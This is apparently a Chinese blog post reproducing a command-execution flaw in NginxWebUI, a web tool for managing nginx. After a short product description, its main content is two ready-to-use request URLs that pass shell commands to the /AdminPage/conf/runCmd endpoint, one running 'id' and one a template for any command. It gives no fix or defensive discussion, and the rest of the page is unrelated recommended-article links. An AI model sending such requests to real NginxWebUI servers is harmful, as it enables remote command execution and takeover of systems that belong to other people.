nginxWebUI runCmd命令执行漏洞复现

仲瑿2023-07-25 19:09

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
复制代码 
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
我是小超人-雨石花3 小时前
Jenkins&Robot Framework持续集成
运维·jenkins·ci
wanhengidc5 小时前
云手机的软件核心是什么
运维·服务器·web安全·游戏·智能手机
芬加达6 小时前
jvm八股
运维·服务器·jvm
小兔薯了6 小时前
11. Linux firewall 防火墙管理
linux·运维·服务器
ink@re7 小时前
Docker环境搭建与容器管理实战:从部署到编排的完整指南
运维·docker·容器
RPA机器人就选八爪鱼8 小时前
RPA财务机器人:驱动财务数字化转型的核心引擎
大数据·运维·人工智能·机器人·rpa
-大头.8 小时前
Redis内存碎片深度解析:从动态整理到核心运维实践
运维·数据库·redis
倦王8 小时前
Linux看ip,改用户名字加权限,在单独用户下设置miniconda
linux·服务器·tcp/ip
qq_2153978979 小时前
docker 管理工具 Portainer安装
运维·服务器·docker
凤凰战士芭比Q9 小时前
Docker安装与常用命令
linux·运维·docker·容器
热门推荐
01GitHub 镜像站点02今天 Cloudflare 全球事故,连 GPT 和你的网站都一起“掉线”了03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05BongoCat - 跨平台键盘猫动画工具06Linux下V2Ray安装配置指南07Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南08全球最强模型Grok4,国内已可免费使用!(附教程)09Labelme从安装到标注:零基础完整指南10Valdi:Snapchat 开源的新一代跨平台 UI 框架